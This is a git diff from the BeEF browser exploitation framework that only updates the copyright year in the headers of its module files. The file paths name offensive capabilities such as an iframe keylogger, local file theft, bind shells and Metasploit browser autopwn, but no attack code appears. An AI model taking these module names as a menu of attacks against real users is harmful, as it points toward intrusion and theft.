diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index d9947a9cf..cae35d0eb 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb
index d2c422a68..a2ebe4586 100644
--- a/modules/host/iphone_tel/module.rb
+++ b/modules/host/iphone_tel/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/physical_location/command.js b/modules/host/physical_location/command.js
index 1a579d28a..3fd92d963 100644
--- a/modules/host/physical_location/command.js
+++ b/modules/host/physical_location/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/host/physical_location/config.yaml b/modules/host/physical_location/config.yaml
index 716fe62dd..68a431ee3 100644
--- a/modules/host/physical_location/config.yaml
+++ b/modules/host/physical_location/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/host/physical_location/module.rb b/modules/host/physical_location/module.rb
index ca9170a8d..b2d9bb86f 100644
--- a/modules/host/physical_location/module.rb
+++ b/modules/host/physical_location/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/cross_site_printing/command.js b/modules/ipec/cross_site_printing/command.js
index 81dea2f96..93ee413b6 100644
--- a/modules/ipec/cross_site_printing/command.js
+++ b/modules/ipec/cross_site_printing/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/ipec/cross_site_printing/config.yaml b/modules/ipec/cross_site_printing/config.yaml
index fca320e93..8ff61247e 100644
--- a/modules/ipec/cross_site_printing/config.yaml
+++ b/modules/ipec/cross_site_printing/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb
index 7a629f80c..306d19563 100644
--- a/modules/ipec/cross_site_printing/module.rb
+++ b/modules/ipec/cross_site_printing/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/dns_tunnel/command.js b/modules/ipec/dns_tunnel/command.js
index a41a2b4d3..c75ea9585 100644
--- a/modules/ipec/dns_tunnel/command.js
+++ b/modules/ipec/dns_tunnel/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/ipec/dns_tunnel/config.yaml b/modules/ipec/dns_tunnel/config.yaml
index e570728eb..8286559be 100644
--- a/modules/ipec/dns_tunnel/config.yaml
+++ b/modules/ipec/dns_tunnel/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/dns_tunnel/module.rb b/modules/ipec/dns_tunnel/module.rb
index cbbeade53..7e7886709 100644
--- a/modules/ipec/dns_tunnel/module.rb
+++ b/modules/ipec/dns_tunnel/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_imap/command.js b/modules/ipec/inter_protocol_imap/command.js
index 45201d7da..bf13b32db 100644
--- a/modules/ipec/inter_protocol_imap/command.js
+++ b/modules/ipec/inter_protocol_imap/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/ipec/inter_protocol_imap/config.yaml b/modules/ipec/inter_protocol_imap/config.yaml
index 4a510d116..55d39f3ae 100644
--- a/modules/ipec/inter_protocol_imap/config.yaml
+++ b/modules/ipec/inter_protocol_imap/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_imap/module.rb b/modules/ipec/inter_protocol_imap/module.rb
index c9c2787b4..be9a59b64 100644
--- a/modules/ipec/inter_protocol_imap/module.rb
+++ b/modules/ipec/inter_protocol_imap/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_irc/command.js b/modules/ipec/inter_protocol_irc/command.js
index f8d522a5b..ec6b83740 100644
--- a/modules/ipec/inter_protocol_irc/command.js
+++ b/modules/ipec/inter_protocol_irc/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/ipec/inter_protocol_irc/config.yaml b/modules/ipec/inter_protocol_irc/config.yaml
index d7514b9c4..45f9a382a 100644
--- a/modules/ipec/inter_protocol_irc/config.yaml
+++ b/modules/ipec/inter_protocol_irc/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb
index c38e447ba..e4ad13045 100644
--- a/modules/ipec/inter_protocol_irc/module.rb
+++ b/modules/ipec/inter_protocol_irc/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js
index a1425f2dc..90bb06002 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/command.js
+++ b/modules/ipec/inter_protocol_posix_bindshell/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/ipec/inter_protocol_posix_bindshell/config.yaml b/modules/ipec/inter_protocol_posix_bindshell/config.yaml
index 9e1596abe..3c65d2aa7 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_posix_bindshell/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb
index cfa507083..0683df646 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js
index 430d157e4..dfc372848 100644
--- a/modules/ipec/inter_protocol_win_bindshell/command.js
+++ b/modules/ipec/inter_protocol_win_bindshell/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml
index aaa438f7b..1355edb2b 100644
--- a/modules/ipec/inter_protocol_win_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb
index 0f4ce6368..ccb0d9b98 100644
--- a/modules/ipec/inter_protocol_win_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_win_bindshell/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/metasploit/browser_autopwn/command.js b/modules/metasploit/browser_autopwn/command.js
index a4f91072c..9c3004143 100644
--- a/modules/metasploit/browser_autopwn/command.js
+++ b/modules/metasploit/browser_autopwn/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/metasploit/browser_autopwn/config.yaml b/modules/metasploit/browser_autopwn/config.yaml
index 46198ce73..382184750 100644
--- a/modules/metasploit/browser_autopwn/config.yaml
+++ b/modules/metasploit/browser_autopwn/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb
index bb18a89c4..63a865176 100644
--- a/modules/metasploit/browser_autopwn/module.rb
+++ b/modules/metasploit/browser_autopwn/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/google_search/command.js b/modules/misc/google_search/command.js
index 52b15152f..4b8918313 100644
--- a/modules/misc/google_search/command.js
+++ b/modules/misc/google_search/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/misc/google_search/config.yaml b/modules/misc/google_search/config.yaml
index fc9868ecb..fbe897d02 100644
--- a/modules/misc/google_search/config.yaml
+++ b/modules/misc/google_search/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/google_search/module.rb b/modules/misc/google_search/module.rb
index b93b59719..830029367 100644
--- a/modules/misc/google_search/module.rb
+++ b/modules/misc/google_search/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/iframe_keylogger/command.js b/modules/misc/iframe_keylogger/command.js
index cafc8cadd..d509f1517 100644
--- a/modules/misc/iframe_keylogger/command.js
+++ b/modules/misc/iframe_keylogger/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/misc/iframe_keylogger/config.yaml b/modules/misc/iframe_keylogger/config.yaml
index c56cb0fef..78580a1c4 100644
--- a/modules/misc/iframe_keylogger/config.yaml
+++ b/modules/misc/iframe_keylogger/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb
index a57d69285..1f06dc176 100644
--- a/modules/misc/iframe_keylogger/module.rb
+++ b/modules/misc/iframe_keylogger/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js
index 0d041d9aa..4c2bd70d9 100644
--- a/modules/misc/iframe_sniffer/command.js
+++ b/modules/misc/iframe_sniffer/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml
index 70ec201e5..5401ad7bc 100644
--- a/modules/misc/iframe_sniffer/config.yaml
+++ b/modules/misc/iframe_sniffer/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb
index effa6a213..f98d27b01 100644
--- a/modules/misc/iframe_sniffer/module.rb
+++ b/modules/misc/iframe_sniffer/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js
index 01eab25c9..3bc00a1ce 100644
--- a/modules/misc/invisible_iframe/command.js
+++ b/modules/misc/invisible_iframe/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml
index b7686b944..46502c69a 100644
--- a/modules/misc/invisible_iframe/config.yaml
+++ b/modules/misc/invisible_iframe/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb
index 357c78f96..571185463 100644
--- a/modules/misc/invisible_iframe/module.rb
+++ b/modules/misc/invisible_iframe/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js
index 868eb9b4c..1cff957ef 100644
--- a/modules/misc/local_file_theft/command.js
+++ b/modules/misc/local_file_theft/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml
index 27ae15b9a..18f07358f 100644
--- a/modules/misc/local_file_theft/config.yaml
+++ b/modules/misc/local_file_theft/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb
index f720d70a4..f1193eceb 100644
--- a/modules/misc/local_file_theft/module.rb
+++ b/modules/misc/local_file_theft/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/raw_javascript/command.js b/modules/misc/raw_javascript/command.js
index ac69d88d4..4d990e076 100644
--- a/modules/misc/raw_javascript/command.js
+++ b/modules/misc/raw_javascript/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/misc/raw_javascript/config.yaml b/modules/misc/raw_javascript/config.yaml
index f344295f8..50c5350fd 100644
--- a/modules/misc/raw_javascript/config.yaml
+++ b/modules/misc/raw_javascript/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb
index c5f97855d..dcc067b3b 100644
--- a/modules/misc/raw_javascript/module.rb
+++ b/modules/misc/raw_javascript/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js
index 162cffb53..409eb8c0c 100644
--- a/modules/network/detect_soc_nets/command.js
+++ b/modules/network/detect_soc_nets/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/detect_soc_nets/config.yaml b/modules/network/detect_soc_nets/config.yaml
index 33e374c5e..8814d0585 100644
--- a/modules/network/detect_soc_nets/config.yaml
+++ b/modules/network/detect_soc_nets/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb
index 0cb515b6b..b31ad4415 100644
--- a/modules/network/detect_soc_nets/module.rb
+++ b/modules/network/detect_soc_nets/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js
index fb9dc6a47..4872d2e11 100644
--- a/modules/network/detect_tor/command.js
+++ b/modules/network/detect_tor/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/detect_tor/config.yaml b/modules/network/detect_tor/config.yaml
index 5dc3db360..710f496c9 100644
--- a/modules/network/detect_tor/config.yaml
+++ b/modules/network/detect_tor/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb
index 05f654bf4..d3cb58ea3 100644
--- a/modules/network/detect_tor/module.rb
+++ b/modules/network/detect_tor/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js
index 011af3b91..cd7397570 100644
--- a/modules/network/dns_enumeration/command.js
+++ b/modules/network/dns_enumeration/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/dns_enumeration/config.yaml b/modules/network/dns_enumeration/config.yaml
index 415e79889..ae29a432e 100644
--- a/modules/network/dns_enumeration/config.yaml
+++ b/modules/network/dns_enumeration/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb
index c68595372..e766ecf85 100644
--- a/modules/network/dns_enumeration/module.rb
+++ b/modules/network/dns_enumeration/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index ef7e669a6..ac04bc0ef 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml
index 46ef6e363..85a0551c4 100644
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index 91a74a2e9..11d84bbd4 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/nat_pinning_irc/command.js b/modules/network/nat_pinning_irc/command.js
index 21d3f52eb..5785a2796 100644
--- a/modules/network/nat_pinning_irc/command.js
+++ b/modules/network/nat_pinning_irc/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/nat_pinning_irc/config.yaml b/modules/network/nat_pinning_irc/config.yaml
index fead9f598..2c16fb586 100644
--- a/modules/network/nat_pinning_irc/config.yaml
+++ b/modules/network/nat_pinning_irc/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb
index 75ed299c2..d8e2f6b23 100644
--- a/modules/network/nat_pinning_irc/module.rb
+++ b/modules/network/nat_pinning_irc/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
